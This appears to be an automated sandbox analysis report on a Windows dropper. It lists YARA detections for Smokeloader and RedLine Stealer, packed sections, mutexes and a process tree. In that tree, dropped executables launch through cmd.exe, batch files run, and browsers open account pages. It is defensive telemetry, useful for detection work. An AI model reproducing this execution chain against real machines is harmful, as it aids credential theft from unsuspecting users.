Source: 0000000B.00000002.3085036724.00000000026C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000024.00000002.3088348052.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.3085641302.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: random[1].exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bfb8bb0dc7.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 6SoKuOqyNh.exe	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: 6SoKuOqyNh.exe	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: explorti.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: explorti.exe.2.dr	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: random[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: random[1].exe.11.dr	Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
Source: enter[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: enter[1].exe.11.dr	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9996798155737705
Source: RoamingHJKECAAAFH.exe.11.dr	Static PE information: Section: axajwlnp ZLIB complexity 0.9949373417357275
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: RoamingFHJDBKJKFI.exe.11.dr	Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
Source: axplong.exe.47.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: axplong.exe.47.dr	Static PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@154/216@84/22

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_6C6A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

11_2_6C6A7030

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

11_2_004190A0

Source: C:\Users\user\1000003002\d27375200a.exe

Code function: 12_2_004026B8 LoadResource,SizeofResource,FreeResource,

12_2_004026B8

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9044:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\1000003002\d27375200a.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3.dll.11.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.11.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.11.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: bfb8bb0dc7.exe, bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: bfb8bb0dc7.exe, 0000000B.00000003.2856849550.0000000022E09000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000003.2885748610.0000000022DFC000.00000004.00000020.00020000.00000000.sdmp, IECBAFCAAKJDHJKFIEBG.11.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: bfb8bb0dc7.exe, 0000000B.00000002.3103235521.000000001CA66000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3125692171.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.11.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 6SoKuOqyNh.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

File read: C:\Users\user\Desktop\6SoKuOqyNh.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6SoKuOqyNh.exe "C:\Users\user\Desktop\6SoKuOqyNh.exe"
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2104,i,2763615900740779582,2928717422686434053,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2256 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f267dd4-7cc3-4504-b66d-b554eae41855} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 1892526ad10 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5280 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3540 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3064 -parentBuildID 20230927232528 -prefsHandle 3208 -prefMapHandle 3204 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2957b26f-774e-48be-a5e4-6995945e05fa} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 189373ea410 rdd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7340 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"
Source: unknown	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4B76.tmp\4B77.tmp\4B78.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,9310775074731790964,8760316038364529683,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6720 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7056 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=2256,i,12859344246917402077,1353247810428413468,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2104,i,2763615900740779582,2928717422686434053,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2256 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f267dd4-7cc3-4504-b66d-b554eae41855} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 1892526ad10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
